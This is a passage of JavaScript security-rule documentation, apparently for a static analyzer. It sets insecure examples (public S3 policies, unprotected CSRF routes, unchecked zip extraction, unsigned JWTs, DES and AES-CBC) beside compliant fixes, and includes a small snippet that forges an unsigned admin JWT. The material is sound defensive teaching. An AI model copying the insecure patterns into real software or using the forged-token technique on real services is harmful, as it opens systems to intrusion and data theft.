const helmet = require('helmet');

let app = express();

app.use(helmet.expectCt({
  enforce: true,
  maxAge: 86400
})); // Compliant

See

javascript:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium, they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-explicit', {
      availabilityZone: 'us-west-2a',
      size: Size.gibibytes(1),
      encrypted: false // Sensitive
    });

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-implicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
    }); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'encrypted-explicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
      encrypted: true
    });

See

javascript:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant users only the permissions necessary for their required tasks. In the context of resource-based policies, list the principals that need access and grant them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AnyPrincipal()] // Sensitive
}))

Compliant Solution

This policy allows only the authorized users:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AccountRootPrincipal()]
}))

See

javascript:S6249

By default, S3 buckets can be accessed through the HTTP and HTTPS protocols.

As HTTP is a clear-text protocol, it lacks encryption of the transported data and the capability to build an authenticated connection. This means that a malicious actor who is able to intercept traffic from the network can read, modify, or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enforce HTTPS-only access by setting the enforceSSL property to true.

Sensitive Code Example

S3 bucket objects access through TLS is not enforced by default:

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example'); // Sensitive

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example', {
    bucketName: 'example',
    versioned: true,
    publicReadAccess: false,
    enforceSSL: true
});

See

javascript:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced by an attacker to perform sensitive actions that they did not intend, such as updating their profile or sending a message, or more generally anything that can change the state of the application.

The attacker can trick the user/victim into clicking a link corresponding to the privileged action, or into visiting a malicious web site that embeds a hidden web request. Because web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state/resources of the web application can be modified with HTTP POST or HTTP DELETE requests, for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • to be implemented, for example, with an unguessable CSRF token.
  • Sensitive operations should never be performed with safe HTTP methods such as GET, which are designed to be used only for information retrieval.

Sensitive Code Example

Express.js CSURF middleware protection is not applied to an unsafe HTTP method such as POST:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie: true });

let app = express();

// Sensitive: this operation does not appear to be protected by the CSURF middleware (csrfProtection is not used)
app.post('/money_transfer', parseForm, function (req, res) {
  res.send('Money transferred');
});

Protection provided by Express.js CSURF middleware is globally disabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["POST", "GET"] })); // Sensitive: POST is an unsafe method

Compliant Solution

Express.js CSURF middleware protection is used on unsafe methods:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie: true });

let app = express();

app.post('/money_transfer', parseForm, csrfProtection, function (req, res) { // Compliant
  res.send('Money transferred')
});

Protection provided by Express.js CSURF middleware is enabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["GET"] })); // Compliant

See

javascript:S6245

Server-side encryption (SSE) encrypts an object (not its metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed: as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk theft, improper disposal of disks, and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply with regulations, such as HIPAA or PCI DSS, or with other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'default'
}); // Sensitive

Bucket encryption is disabled by default.

Compliant Solution

Server-side encryption with AWS KMS-managed keys (SSE-KMS) is used:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS_MANAGED
});

// Alternatively, with a KMS key managed by the user:

new s3.Bucket(this, 'id', {
    encryption: s3.BucketEncryption.KMS,
    encryptionKey: access_key
});

See

javascript:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

errorhandler Express.js middleware should not be used in production:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();
app.use(errorhandler()); // Sensitive

Compliant Solution

errorhandler Express.js middleware used only in development mode:

const express = require('express');
const errorhandler = require('errorhandler');

let app = express();

if (process.env.NODE_ENV === 'development') {
  app.use(errorhandler());
}

See

javascript:S5604

Powerful features are browser features (geolocation, camera, microphone, etc.) that can be accessed with JavaScript APIs and may require a permission granted by the user. These features can have a high impact on privacy and user security, so they should only be used if they are really necessary to implement the critical parts of an application.

This rule highlights intrusive permissions when they are requested with the standard (but still experimental) web browser permissions query API or with the specific APIs related to each permission. It is highly recommended to customize this rule with the permissions considered intrusive in the context of the web application.

Ask Yourself Whether

  • Some powerful features used by the application are not really necessary.
  • Users are not clearly informed why and when powerful features are used by the application.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In order to respect user privacy it is recommended to avoid using intrusive powerful features.

Sensitive Code Example

When using the geolocation API, Firefox, for example, retrieves personal information such as nearby wireless access points and the IP address and sends it to the default geolocation service provider, Google Location Services:

navigator.permissions.query({name:"geolocation"}).then(function(result) {
});  // Sensitive: geolocation is a powerful feature with high privacy concerns

navigator.geolocation.getCurrentPosition(function(position) {
  console.log("coordinates x="+position.coords.latitude+" and y="+position.coords.longitude);
}); // Sensitive: geolocation is a powerful feature with high privacy concerns

Compliant Solution

If geolocation is required, always explain to the user why the application needs it and prefer requesting an approximate location when possible:

<html>
<head>
    <title>
        Retailer website example
    </title>
</head>
<body>
    Type a city, street or zip code where you want to retrieve the closest retail locations of our products:
    <form method=post>
        <input type=text value="New York"> <!-- Compliant -->
    </form>
</body>
</html>

See

javascript:S5725

Using remote artifacts without integrity checks can lead to the unexpected execution of malicious code in the application.

On the client side, where front-end code is executed, malicious code could:

  • impersonate users' identities and take advantage of their privileges on the application.
  • add silent malware that monitors users' sessions and captures sensitive secrets.
  • gain access to sensitive clients' personal data.
  • deface the application or otherwise affect its general availability.
  • mine cryptocurrencies in the background.

Likewise, a compromised software component deployed on the server side could severely affect the application’s security. For example, server-side malware could:

  • access and modify sensitive technical and business data.
  • elevate its privileges on the underlying operating system.
  • use the compromised application as a pivot to attack the local network.

By ensuring that a remote artifact is exactly what it is supposed to be before using it, the application is protected from unexpected changes applied to it before it is downloaded.
In particular, integrity checks make it possible to identify an artifact that was replaced by malware on the publication website or, in a more benign scenario, one that was legitimately changed by its author.

Important note: downloading an artifact over HTTPS only protects it while in transit from one host to another. It provides authenticity and integrity checks for the network stream only. It does not ensure the authenticity or security of the artifact itself.

Ask Yourself Whether

  • The artifact is a file intended to execute code.
  • The artifact is a file that is intended to configure or affect running code in some way.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To check the integrity of a remote artifact, hash verification is the most reliable solution: it ensures that the file has not been modified since the fingerprint was computed.

In this case, the artifact’s hash must:

  • Be computed with a secure hash algorithm such as SHA512, SHA384 or SHA256.
  • Be compared with a secure hash that was not downloaded from the same source.

To do so, the best option is to add the hash in the code explicitly, by following Mozilla’s official documentation on how to generate integrity strings.

Note: Use this fix together with version binding on the remote file. Avoid downloading files named "latest" or similar, so that the front-end pages do not break when the code of the latest remote artifact changes.

Sensitive Code Example

The following code sample uses neither integrity checks nor version pinning:

let script = document.createElement("script");
script.src = "https://cdn.example.com/latest/script.js"; // Sensitive
script.crossOrigin = "anonymous";
document.head.appendChild(script);

Compliant Solution

let script = document.createElement("script");
script.src = "https://cdn.example.com/v5.3.6/script.js";
script.integrity = "sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC";
script.crossOrigin = "anonymous";
document.head.appendChild(script);

See

javascript:S5728

Content security policy (CSP) fetch directives are a W3C standard used by a server to specify, via an HTTP header, the origins from which the browser is allowed to load resources. It can help mitigate the risk of cross-site scripting (XSS) attacks and reduce the privileges used by an application. If the website does not define a CSP header, the browser applies the same-origin policy by default.

Content-Security-Policy: default-src 'self'; script-src 'self' http://www.example.com

In the above example, all resources are allowed from the website where this header is set, and script resources fetched from www.example.com are also authorized:

<img src="selfhostedimage.png"> <!-- will be loaded because the default-src 'self' directive applies -->
<img src="http://www.example.com/image.png"> <!-- will NOT be loaded because the default-src 'self' directive applies -->
<script src="http://www.example.com/library.js"></script> <!-- will be loaded because the script-src 'self' http://www.example.com directive applies -->
<script src="selfhostedscript.js"></script> <!-- will be loaded because the script-src 'self' http://www.example.com directive applies -->
<script src="http://www.otherexample.com/library.js"></script> <!-- will NOT be loaded because the script-src 'self' http://www.example.com directive applies -->

Ask Yourself Whether

  • The resources of the application are fetched from various untrusted locations.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy fetch directives, in particular the default-src directive, and continue to properly sanitize and validate all inputs of the application: CSP fetch directives are only a tool to reduce the impact of cross-site scripting attacks.

Sensitive Code Example

In an Express.js application, the code is sensitive if the helmet contentSecurityPolicy middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(
    helmet({
      contentSecurityPolicy: false, // Sensitive
    })
);

Compliant Solution

In an Express.js application, a standard way to implement CSP is the helmet contentSecurityPolicy middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();
app.use(helmet.contentSecurityPolicy()); // Compliant

See

javascript:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data that expands into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers compress irrelevant data (e.g. a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed sizes of each archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data; in general, the data compression ratio for most legitimate archives is 1 to 3.
  • Define and control the threshold for the maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if it exceeds a predefined threshold; in particular, it’s not recommended to expand archives recursively (an entry of an archive could itself be an archive).

Sensitive Code Example

For tar module:

const tar = require('tar');

tar.x({ // Sensitive
  file: 'foo.tar.gz'
});

For adm-zip module:

const AdmZip = require('adm-zip');

let zip = new AdmZip("./foo.zip");
zip.extractAllTo("."); // Sensitive

For jszip module:

const fs = require("fs");
const JSZip = require("jszip");

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) { // Sensitive
    zip.forEach(function (relativePath, zipEntry) {
      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(zipEntry.name);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          fs.writeFileSync(zipEntry.name, content);
        });
      }
    });
  });
});

For yauzl module:

const yauzl = require('yauzl');

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  zipfile.on("entry", function(entry) {
    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

For extract-zip module:

const extract = require('extract-zip')

async function main() {
  let target = __dirname + '/test';
  await extract('test.zip', { dir: target }); // Sensitive
}
main();

Compliant Solution

For tar module:

const tar = require('tar');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;

tar.x({
  file: 'foo.tar.gz',
  filter: (path, entry) => {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    totalSize += entry.size;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    return true;
  }
});

For adm-zip module:

const AdmZip = require('adm-zip');
const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

let fileCount = 0;
let totalSize = 0;
let zip = new AdmZip("./foo.zip");
let zipEntries = zip.getEntries();
zipEntries.forEach(function(zipEntry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
    }

    let entrySize = zipEntry.getData().length;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
    }

    let compressionRatio = entrySize / zipEntry.header.compressedSize;
    if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
    }

    if (!zipEntry.isDirectory) {
        zip.extractEntryTo(zipEntry.entryName, ".");
    }
});

For jszip module:

const fs = require("fs");
const pathmodule = require("path");
const JSZip = require("jszip");

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB

let fileCount = 0;
let totalSize = 0;
let targetDirectory = __dirname + '/archive_tmp';

fs.readFile("foo.zip", function(err, data) {
  if (err) throw err;
  JSZip.loadAsync(data).then(function (zip) {
    zip.forEach(function (relativePath, zipEntry) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // Prevent ZipSlip path traversal (S6096)
      const resolvedPath = pathmodule.join(targetDirectory, zipEntry.name);
      if (!resolvedPath.startsWith(targetDirectory)) {
        throw 'Path traversal detected';
      }

      if (!zip.file(zipEntry.name)) {
        fs.mkdirSync(resolvedPath);
      } else {
        zip.file(zipEntry.name).async('nodebuffer').then(function (content) {
          totalSize += content.length;
          if (totalSize > MAX_SIZE) {
            throw 'Reached max. size';
          }

          fs.writeFileSync(resolvedPath, content);
        });
      }
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For yauzl module:

const yauzl = require('yauzl');

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

yauzl.open('foo.zip', function (err, zipfile) {
  if (err) throw err;

  let fileCount = 0;
  let totalSize = 0;

  zipfile.on("entry", function(entry) {
    fileCount++;
    if (fileCount > MAX_FILES) {
      throw 'Reached max. number of files';
    }

    // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
    // Alternatively, calculate the size from the readStream.
    let entrySize = entry.uncompressedSize;
    totalSize += entrySize;
    if (totalSize > MAX_SIZE) {
      throw 'Reached max. size';
    }

    if (entry.compressedSize > 0) {
      let compressionRatio = entrySize / entry.compressedSize;
      if (compressionRatio > THRESHOLD_RATIO) {
        throw 'Reached max. compression ratio';
      }
    }

    zipfile.openReadStream(entry, function(err, readStream) {
      if (err) throw err;
      // TODO: extract
    });
  });
});

Be aware that due to the similar structure of sensitive and compliant code the issue will be raised in both cases. It is up to the developer to decide if the implementation is secure.

For extract-zip module:

const extract = require('extract-zip')

const MAX_FILES = 10000;
const MAX_SIZE = 1000000000; // 1 GB
const THRESHOLD_RATIO = 10;

async function main() {
  let fileCount = 0;
  let totalSize = 0;

  let target = __dirname + '/foo';
  await extract('foo.zip', {
    dir: target,
    onEntry: function(entry, zipfile) {
      fileCount++;
      if (fileCount > MAX_FILES) {
        throw 'Reached max. number of files';
      }

      // The uncompressedSize comes from the zip headers, so it might not be trustworthy.
      // Alternatively, calculate the size from the readStream.
      let entrySize = entry.uncompressedSize;
      totalSize += entrySize;
      if (totalSize > MAX_SIZE) {
        throw 'Reached max. size';
      }

      if (entry.compressedSize > 0) {
        let compressionRatio = entrySize / entry.compressedSize;
        if (compressionRatio > THRESHOLD_RATIO) {
          throw 'Reached max. compression ratio';
        }
      }
    }
  });
}
main();

See

javascript:S6252

S3 buckets can be versioned. When an S3 bucket is unversioned, a new version of an object overwrites the existing one in the bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that requires high availability.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning so that different versions of an object can be retrieved and restored.

Sensitive Code Example

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: false // Sensitive
});

The default value of versioned is false, so the absence of this parameter is also sensitive.

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    versioned: true
});

See

javascript:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.
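To illustrate why a missing signature is fatal, the following sketch forges an unsigned token whose header advertises the "none" algorithm; any verifier that accepts this algorithm will trust the forged claims (the claim values here are invented purely for the example):

```javascript
// Forge a token with no signature: the header advertises alg "none", so a
// verifier that accepts that algorithm performs no signature check at all.
function forgeUnsignedToken(claims) {
  const b64url = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
  // An unsigned JWT still has three dot-separated parts; the third is empty.
  return `${b64url({ alg: 'none', typ: 'JWT' })}.${b64url(claims)}.`;
}

const forged = forgeUnsignedToken({ sub: 'admin', role: 'administrator' });
console.log(forged);
```

No secret material is needed to produce this token, which is exactly why "none" must never be an accepted algorithm.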

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in jsonwebtoken

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'none' }); // Noncompliant

const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['none'] // Noncompliant
}, callbackcheck);

Compliant solution

const jwt = require('jsonwebtoken');

jwt.sign(payload, key, { algorithm: 'HS256' });

const jwt = require('jsonwebtoken');

jwt.verify(token, key, {
    expiresIn: 360000,
    algorithms: ['HS256']
}, callbackcheck);

How does this work?

Always sign your tokens

The foremost measure to enhance JWT security is to ensure that every JWT you issue is signed. Unsigned tokens are like open books that anyone can tamper with. Signing your JWTs ensures that any alterations to the tokens after they have been issued can be detected. Most JWT libraries support a signing function, and using it is usually as simple as providing a secret key when the token is created.

Choose a strong cipher algorithm

It is not enough to merely sign your tokens. You need to sign them with a strong cipher algorithm. Algorithms like HS256 (HMAC using SHA-256) are considered secure for most purposes. But for an additional layer of security, you could use an algorithm like RS256 (RSA Signature with SHA-256), which uses a private key for signing and a public key for verification. This way, even if someone gains access to the public key, they will not be able to forge tokens.

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.
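For instance, a minimal sketch of loading the key from an environment variable rather than from source code (the variable name JWT_SECRET and the helper are illustrative):

```javascript
// Read the signing key from the environment instead of hard-coding it.
// Failing fast at startup is preferable to silently signing with undefined.
function loadSigningKey(env = process.env) {
  const key = env.JWT_SECRET;
  if (!key) {
    throw new Error('JWT_SECRET is not set; refusing to start without a signing key');
  }
  return key;
}
```

The same pattern applies when the key comes from a key management system or vault service: resolve it at startup and fail loudly if it is missing.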

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.
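One hedged sketch of such a grace period: keep the previous key active alongside the current one, verify incoming tokens against each active key in turn, and always sign new tokens with the current key (verifyFn stands in for whatever verification function the application already uses):

```javascript
// During rotation, tokens signed with the previous key are still accepted
// for a grace period; new tokens are always signed with the current key,
// which should be listed first in activeKeys.
function verifyWithRotation(token, activeKeys, verifyFn) {
  for (const key of activeKeys) {
    try {
      return verifyFn(token, key);
    } catch (e) {
      // Signature did not match this key; try the next active key.
    }
  }
  throw new Error('token is not valid under any active key');
}
```

Once the grace period ends, the previous key is removed from the active list and tokens signed with it are rejected.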

Resources

Standards

javascript:S2819

Why is this an issue?

Browsers allow message exchanges between Window objects of different origins.

Because any window can send or receive messages from another window, it is important to verify the sender’s/receiver’s identity:

  • When sending a message with the postMessage method, the receiver's identity should be defined (the wildcard keyword (*) should not be used).
  • When receiving a message with a message event, the sender’s identity should be verified using the origin and possibly source properties.

Noncompliant code example

When sending a message:

var iframe = document.getElementById("testiframe");
iframe.contentWindow.postMessage("secret", "*"); // Noncompliant: * is used

When receiving a message:

window.addEventListener("message", function(event) { // Noncompliant: no checks are done on the origin property.
      console.log(event.data);
 });

Compliant solution

When sending a message:

var iframe = document.getElementById("testsecureiframe");
iframe.contentWindow.postMessage("hello", "https://secure.example.com"); // Compliant

When receiving a message:

window.addEventListener("message", function(event) {

  if (event.origin !== "http://example.org") // Compliant
    return;

  console.log(event.data)
});

Resources

javascript:S5547

This vulnerability makes it possible for the cleartext of the encrypted message to be recovered without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

const crypto = require('crypto');

crypto.createCipheriv("DES", key, iv); // Noncompliant

Compliant solution

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

javascript:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker is able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Node.js

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-128-CBC", key, iv); // Noncompliant

Compliant solution

Example with a symmetric cipher, AES:

const crypto = require('crypto');

crypto.createCipheriv("AES-256-GCM", key, iv);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR
  • EAX: encrypt-then-authenticate-then-translate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

